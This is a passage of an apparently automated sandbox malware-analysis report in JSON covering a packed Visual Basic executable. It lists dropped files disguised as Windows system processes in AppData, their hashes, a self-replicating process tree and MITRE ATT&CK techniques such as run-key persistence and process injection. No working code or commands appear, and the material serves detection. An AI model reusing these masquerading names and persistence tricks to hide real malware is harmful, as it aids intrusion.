"%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 93728, "sha256": "a2d1169dc0f03c71e874035b640d5d4c79316d99d9b2e452d9f1ce0d4770c0f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 93728, "sha256": "094805abb7e6ff629150320563ca99431dc0b8b328b8dd1291aa9bec578fb69e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 93728, "sha256": "aa79d5746097c70cc75dea5a20ae7ccb2016d823825f17ca921e91ab5d67fa33", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINLOGON.EXE", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_path": "%LOCALAPPDATA%\\csrss.exe", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe (PID: 5284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_path": "%LOCALAPPDATA%\\lsass.exe", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe (PID: 5284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services.exe", "file_path": "%LOCALAPPDATA%\\services.exe", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe (PID: 5284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_path": "%LOCALAPPDATA%\\smss.exe", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe (PID: 5284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_path": "%LOCALAPPDATA%\\winlogon.exe", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe (PID: 5284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_path": "%WINDIR%\\4k51k4.exe", "file_size": 93728, "sha256": "1e42c7f53fbf0b5e09b276251540a6c9c19417cf30b9daf82f8036836fb4bc82", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 93728, "sha256": "d2e0fc744d865b287ecd4dca20c425ac3a40e2dec7ee531f1b24ce8560987fc4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 93728, "sha256": "8e91c255c4e05168d1ec9acd75af4c10f483f967b8a9b6a1f7cc89ba0da89c37", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_path": "C:\\4K51K4\\New Folder.exe", "file_size": 93728, "sha256": "d8639e7be6d222b0107c6f31644effa4e8723e98d3c037f268610b5903c170d4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe (PID: 5284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_path": "C:\\4k51k4.exe", "file_size": 93728, "sha256": "1e42c7f53fbf0b5e09b276251540a6c9c19417cf30b9daf82f8036836fb4bc82", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_path": "C:\\Data %OSUSER%.exe", "file_size": 93728, "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe (PID: 5284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES .exe", "file_size": 93728, "sha256": "6a992fc63a1c56cc58a33623aa8a1a52e01bc3361a556abe0d4afdb712d6e957", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9DCB2.bin", "file_size": 93728, "sha256": "2b071293e9148cf685e9ef829d10bd17ed87eb76976dde42f1fa5f18ce2b2174", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C389.bin", "file_size": 93728, "sha256": "877b1d1d3411110dd26757dd7981b52a48d1b0ee18cc22a83f32c58f1a9f3f6c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE.bin", "file_size": 93728, "sha256": "a2d1169dc0f03c71e874035b640d5d4c79316d99d9b2e452d9f1ce0d4770c0f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9DCF1.bin", "file_size": 93728, "sha256": "d2e0fc744d865b287ecd4dca20c425ac3a40e2dec7ee531f1b24ce8560987fc4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9DDC9.bin", "file_size": 93728, "sha256": "1e42c7f53fbf0b5e09b276251540a6c9c19417cf30b9daf82f8036836fb4bc82", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C387.bin", "file_size": 93728, "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005284", "name": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe", "normalized_path": "C:\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe", "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1"}, {"uid": "00000000-00005232", "parentuid": "00000000-00005284", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492"}, {"uid": "00000000-00004088", "parentuid": "00000000-00005232", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492"}, {"uid": "00000000-00002340", "parentuid": "00000000-00005232", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "877b1d1d3411110dd26757dd7981b52a48d1b0ee18cc22a83f32c58f1a9f3f6c"}, {"uid": "00000000-00005152", "parentuid": "00000000-00005232", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "07c4ee8f24962dced5039dbcd9666fb4bc5b5ff9236fcea5e929aaa6533487fa"}, {"uid": "00000000-00005260", "parentuid": "00000000-00005232", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "706651839285d9454fda8daf6900c7baf8cf9b5d2e47624667a3cc5ea028b19b"}, {"uid": "00000000-00005376", "parentuid": "00000000-00005232", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "66209a7b0344f8504b4f0156dd3f776c8a9198fa5095bf58f1c43ae148c757e4"}, {"uid": "00000000-00005560", "parentuid": "00000000-00005376", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492"}, {"uid": "00000000-00003304", "parentuid": "00000000-00005376", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "877b1d1d3411110dd26757dd7981b52a48d1b0ee18cc22a83f32c58f1a9f3f6c"}, {"uid": "00000000-00002416", "parentuid": "00000000-00005376", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "07c4ee8f24962dced5039dbcd9666fb4bc5b5ff9236fcea5e929aaa6533487fa"}, {"uid": "00000000-00002760", "parentuid": "00000000-00005376", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "706651839285d9454fda8daf6900c7baf8cf9b5d2e47624667a3cc5ea028b19b"}, {"uid": "00000000-00004444", "parentuid": "00000000-00005376", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "66209a7b0344f8504b4f0156dd3f776c8a9198fa5095bf58f1c43ae148c757e4"}, {"uid": "00000000-00004184", "parentuid": "00000000-00005376", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cb40481f999b38cd4b8bb24dd6cf016edd3a567669d15ca5c26e898ed899acc1"}, {"uid": "00000000-00004536", "parentuid": "00000000-00005376", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "479c5660b0ab564f987e98e8de6c5718a0ee0fb3bf5a909f20248d18588128a3"}, {"uid": "00000000-00001476", "parentuid": "00000000-00005376", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "2b071293e9148cf685e9ef829d10bd17ed87eb76976dde42f1fa5f18ce2b2174"}, {"uid": "00000000-00002864", "parentuid": "00000000-00005376", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "d2e0fc744d865b287ecd4dca20c425ac3a40e2dec7ee531f1b24ce8560987fc4"}, {"uid": "00000000-00005820", "parentuid": "00000000-00005232", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cb40481f999b38cd4b8bb24dd6cf016edd3a567669d15ca5c26e898ed899acc1"}, {"uid": "00000000-00005692", "parentuid": "00000000-00005232", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "479c5660b0ab564f987e98e8de6c5718a0ee0fb3bf5a909f20248d18588128a3"}, {"uid": "00000000-00003992", "parentuid": "00000000-00005692", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492"}, {"uid": "00000000-00005556", "parentuid": "00000000-00005692", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "877b1d1d3411110dd26757dd7981b52a48d1b0ee18cc22a83f32c58f1a9f3f6c"}, {"uid": "00000000-00005740", "parentuid": "00000000-00005692", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "07c4ee8f24962dced5039dbcd9666fb4bc5b5ff9236fcea5e929aaa6533487fa"}, {"uid": "00000000-00002512", "parentuid": "00000000-00005692", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "706651839285d9454fda8daf6900c7baf8cf9b5d2e47624667a3cc5ea028b19b"}, {"uid": "00000000-00004016", "parentuid": "00000000-00005692", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "66209a7b0344f8504b4f0156dd3f776c8a9198fa5095bf58f1c43ae148c757e4"}, {"uid": "00000000-00004472", "parentuid": "00000000-00005692", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cb40481f999b38cd4b8bb24dd6cf016edd3a567669d15ca5c26e898ed899acc1"}, {"uid": "00000000-00001812", "parentuid": "00000000-00005692", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "479c5660b0ab564f987e98e8de6c5718a0ee0fb3bf5a909f20248d18588128a3"}, {"uid": "00000000-00003876", "parentuid": "00000000-00005284", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "877b1d1d3411110dd26757dd7981b52a48d1b0ee18cc22a83f32c58f1a9f3f6c"}, {"uid": "00000000-00005116", "parentuid": "00000000-00003876", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492"}, {"uid": "00000000-00005476", "parentuid": "00000000-00003876", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "877b1d1d3411110dd26757dd7981b52a48d1b0ee18cc22a83f32c58f1a9f3f6c"}, {"uid": "00000000-00005816", "parentuid": "00000000-00003876", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "07c4ee8f24962dced5039dbcd9666fb4bc5b5ff9236fcea5e929aaa6533487fa"}, {"uid": "00000000-00005888", "parentuid": "00000000-00003876", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "706651839285d9454fda8daf6900c7baf8cf9b5d2e47624667a3cc5ea028b19b"}, {"uid": "00000000-00005696", "parentuid": "00000000-00003876", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "66209a7b0344f8504b4f0156dd3f776c8a9198fa5095bf58f1c43ae148c757e4"}, {"uid": "00000000-00003160", "parentuid": "00000000-00003876", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cb40481f999b38cd4b8bb24dd6cf016edd3a567669d15ca5c26e898ed899acc1"}, {"uid": "00000000-00005480", "parentuid": "00000000-00003876", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "479c5660b0ab564f987e98e8de6c5718a0ee0fb3bf5a909f20248d18588128a3"}, {"uid": "00000000-00003924", "parentuid": "00000000-00005284", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "07c4ee8f24962dced5039dbcd9666fb4bc5b5ff9236fcea5e929aaa6533487fa"}, {"uid": "00000000-00005608", "parentuid": "00000000-00003924", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492"}, {"uid": "00000000-00004192", "parentuid": "00000000-00003924", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "877b1d1d3411110dd26757dd7981b52a48d1b0ee18cc22a83f32c58f1a9f3f6c"}, {"uid": "00000000-00003336", "parentuid": "00000000-00003924", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "07c4ee8f24962dced5039dbcd9666fb4bc5b5ff9236fcea5e929aaa6533487fa"}, {"uid": "00000000-00004340", "parentuid": "00000000-00003924", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "706651839285d9454fda8daf6900c7baf8cf9b5d2e47624667a3cc5ea028b19b"}, {"uid": "00000000-00005652", "parentuid": "00000000-00003924", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "66209a7b0344f8504b4f0156dd3f776c8a9198fa5095bf58f1c43ae148c757e4"}, {"uid": "00000000-00005040", "parentuid": "00000000-00003924", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cb40481f999b38cd4b8bb24dd6cf016edd3a567669d15ca5c26e898ed899acc1"}, {"uid": "00000000-00005364", "parentuid": "00000000-00003924", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "479c5660b0ab564f987e98e8de6c5718a0ee0fb3bf5a909f20248d18588128a3"}, {"uid": "00000000-00005184", "parentuid": "00000000-00005284", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "706651839285d9454fda8daf6900c7baf8cf9b5d2e47624667a3cc5ea028b19b"}, {"uid": "00000000-00005836", "parentuid": "00000000-00005184", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492"}, {"uid": "00000000-00006052", "parentuid": "00000000-00005184", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "877b1d1d3411110dd26757dd7981b52a48d1b0ee18cc22a83f32c58f1a9f3f6c"}, {"uid": "00000000-00004240", "parentuid": "00000000-00005184", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "07c4ee8f24962dced5039dbcd9666fb4bc5b5ff9236fcea5e929aaa6533487fa"}, {"uid": "00000000-00003700", "parentuid": "00000000-00005184", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "706651839285d9454fda8daf6900c7baf8cf9b5d2e47624667a3cc5ea028b19b"}, {"uid": "00000000-00005280", "parentuid": "00000000-00005184", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "66209a7b0344f8504b4f0156dd3f776c8a9198fa5095bf58f1c43ae148c757e4"}, {"uid": "00000000-00004332", "parentuid": "00000000-00005184", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cb40481f999b38cd4b8bb24dd6cf016edd3a567669d15ca5c26e898ed899acc1"}, {"uid": "00000000-00002384", "parentuid": "00000000-00005184", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "479c5660b0ab564f987e98e8de6c5718a0ee0fb3bf5a909f20248d18588128a3"}, {"uid": "00000000-00005912", "parentuid": "00000000-00005284", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "66209a7b0344f8504b4f0156dd3f776c8a9198fa5095bf58f1c43ae148c757e4"}, {"uid": "00000000-00005396", "parentuid": "00000000-00005284", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cb40481f999b38cd4b8bb24dd6cf016edd3a567669d15ca5c26e898ed899acc1"}, {"uid": "00000000-00004108", "parentuid": "00000000-00005396", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "838c12a3f10b3ca3b2ae800c06b402ab02dfc19791d90d12b45e3f0dafe80492"}, {"uid": "00000000-00005532", "parentuid": "00000000-00005396", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "877b1d1d3411110dd26757dd7981b52a48d1b0ee18cc22a83f32c58f1a9f3f6c"}, {"uid": "00000000-00005864", "parentuid": "00000000-00005396", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "07c4ee8f24962dced5039dbcd9666fb4bc5b5ff9236fcea5e929aaa6533487fa"}, {"uid": "00000000-00005488", "parentuid": "00000000-00005396", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "706651839285d9454fda8daf6900c7baf8cf9b5d2e47624667a3cc5ea028b19b"}, {"uid": "00000000-00003492", "parentuid": "00000000-00005396", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "66209a7b0344f8504b4f0156dd3f776c8a9198fa5095bf58f1c43ae148c757e4"}, {"uid": "00000000-00003136", "parentuid": "00000000-00005396", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cb40481f999b38cd4b8bb24dd6cf016edd3a567669d15ca5c26e898ed899acc1"}, {"uid": "00000000-00001200", "parentuid": "00000000-00005396", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "479c5660b0ab564f987e98e8de6c5718a0ee0fb3bf5a909f20248d18588128a3"}, {"uid": "00000000-00000308", "parentuid": "00000000-00005396", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "2b071293e9148cf685e9ef829d10bd17ed87eb76976dde42f1fa5f18ce2b2174"}, {"uid": "00000000-00002956", "parentuid": "00000000-00005396", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "d2e0fc744d865b287ecd4dca20c425ac3a40e2dec7ee531f1b24ce8560987fc4"}, {"uid": "00000000-00005748", "parentuid": "00000000-00005284", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "479c5660b0ab564f987e98e8de6c5718a0ee0fb3bf5a909f20248d18588128a3"}, {"uid": "00000000-00002368", "parentuid": "00000000-00005284", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "2b071293e9148cf685e9ef829d10bd17ed87eb76976dde42f1fa5f18ce2b2174"}, {"uid": "00000000-00004836", "parentuid": "00000000-00002368", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "2b071293e9148cf685e9ef829d10bd17ed87eb76976dde42f1fa5f18ce2b2174"}, {"uid": "00000000-00000508", "parentuid": "00000000-00005284", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "d2e0fc744d865b287ecd4dca20c425ac3a40e2dec7ee531f1b24ce8560987fc4"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", 